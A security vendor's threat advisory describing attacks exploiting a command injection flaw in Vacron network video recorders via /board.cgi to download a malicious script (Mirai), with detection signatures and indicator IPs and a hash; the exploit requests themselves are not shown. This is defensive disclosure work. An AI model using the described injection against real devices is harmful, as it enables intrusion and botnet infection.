Vacron Network Video Recorder Remote Command Execution

By

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerability in Vacron NVR.

Network video recorders (NVRs) are IP-based appliances that are built for managing cameras, recording and viewing camera feeds at a site. NVRs are usually PC-grade or low-end server systems made using commercial off-the-shelf (COTS) hardware components. They typically contain an embedded operating system or a client operating system that hosts video management software, which provides users a mechanism to view, record and manage camera feeds. Vacron sells NVRs as well as other products.

Vacron NVR Remote Command Execution Vulnerability

The goal of command injection  attack  is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.

The remote Vacron network video recorder is affected by a remote command execution vulnerability due to improper sanitization of user-supplied input passed via /board.cgi.

Following are some of the exploits found in the wild:

As one can see the vulnerable /board.cgi cannot properly sanitize the input. This allows the attacker to inject and execute the commands to change the directory and download malicious script from the attacker-controlled server.

SonicWall Capture Labs provides protection against this threat via following signatures:

      • IPS 13033:Vacron NVR Remote Command Execution
      • GAV: Linux.Mirai.N_2

IoCs

    • 222.138.188.211
    • 103.181.56.61
    • 125.44.20.51
    • 175.107.0.212
    • 3a43d007ed5ff84d4b71f96a49c88fe0061a2a9651935a82d4acbf55982fc370

Threat Graph

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.